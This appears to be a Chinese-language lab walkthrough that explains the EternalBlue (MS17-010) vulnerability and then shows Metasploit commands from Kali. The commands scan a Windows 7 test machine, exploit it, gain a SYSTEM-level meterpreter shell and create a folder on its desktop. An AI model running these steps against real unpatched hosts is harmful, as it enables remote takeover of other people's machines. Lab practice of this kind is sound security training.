简介:
永恒之蓝(EternalBlue)是一个由美国国家安全局(NSA)开发的漏洞利用工具,用于攻击运行Microsoft Windows操作系统的计算机。这个漏洞利用工具最初在2017年被“Shadow Brokers”组织泄露,并引发了全球范围内的恶意软件攻击,特别是“ WannaCry ”勒索软件攻击。
EternalBlue漏洞利用了Windows操作系统的一个SMB(Server Message Block)协议的漏洞,允许攻击者远程执行恶意代码,而无需用户的交互或权限。攻击者可以利用这个漏洞在受感染的计算机上安装恶意软件、窃取数据或者进行其他恶意活动。
这个漏洞的危害性非常严重,因为它影响了大量运行Windows操作系统的计算机,尤其是那些没有及时安装安全补丁的系统。微软公司已经发布了针对EternalBlue漏洞的安全补丁,建议用户及时更新他们的系统以保护其免受潜在的攻击。
尽管安全补丁已经发布,但EternalBlue漏洞依然是一个重要的安全威胁,因为仍然有许多未更新的系统容易受到攻击。因此,网络安全意识和实施安全最佳实践对于防范此类攻击至关重要。
主机信息
攻击机:kali
实验机:windows 7
确保攻击机和实验机在一个网段
用kali扫下win7的ip
用kali打开msfconsole,查看漏洞信息
search ms17_010
auxiliary/scanner/smb/smb_ms17_010
这个模块的作用是扫描目标网络中的主机,检测是否存在 MS17-010 漏洞。如果发现受影响的系统,这意味着攻击者可以利用该漏洞执行恶意代码,从而获取对系统的远程访问权限。
漏洞利用
use 3 选中该模块
show options 查看模块的可配置选项
这边显示我们可以指定一个ip去扫描,然后run执行
set RHOSTS 10.4.7.137
针对目标IP地址 10.4.7.137 上运行的Windows 7 系统进行了MS17-010漏洞扫描,结果显示目标主机很可能对MS17-010漏洞存在漏洞
再次指定ip 选中这个模块,exploit攻击
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.4.7.137
exploit
WIN!
看到meterpreter已经利用漏洞进到了对方主机
看下现在的权限
getuid
system!最高权限
shell进入对方的命令行
给实验机创建一个niuma文件夹到桌面上
mkdir C:\Users\administrator\Desktop\niuma
可以创建